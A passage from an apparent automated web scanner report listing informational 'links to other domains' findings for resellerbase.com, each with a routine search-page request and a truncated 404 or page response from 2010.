User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.251. http://www.resellerbase.com/detail/7/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.252. http://www.resellerbase.com/detail/7/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/7/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.253. http://www.resellerbase.com/detail/8/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/8/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.254. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/8/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.255. http://www.resellerbase.com/detail/8/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/8/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.256. http://www.resellerbase.com/detail/8/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/8/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.257. http://www.resellerbase.com/detail/8/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/8/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.258. http://www.resellerbase.com/detail/9/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.259. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/9/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.260. http://www.resellerbase.com/detail/9/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/9/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.261. http://www.resellerbase.com/detail/9/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/9/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.262. http://www.resellerbase.com/detail/9/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/9/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.263. http://www.resellerbase.com/detail/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.264. http://www.resellerbase.com/get_rated.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /get_rated.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /get_rated.php?id=555-555-0199@example.com&pflag=view&submit=Submit HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:00:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 17969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>How to Get Rated</ti
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.265. http://www.resellerbase.com/goods-wholesale/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /goods-wholesale/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.266. http://www.resellerbase.com/goods-wholesale/googlepr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/googlepr.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /goods-wholesale/googlepr.php?link_id=6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.267. http://www.resellerbase.com/goods-wholesale/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /goods-wholesale/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.268. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /goods-wholesale/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.269. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /goods-wholesale/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/
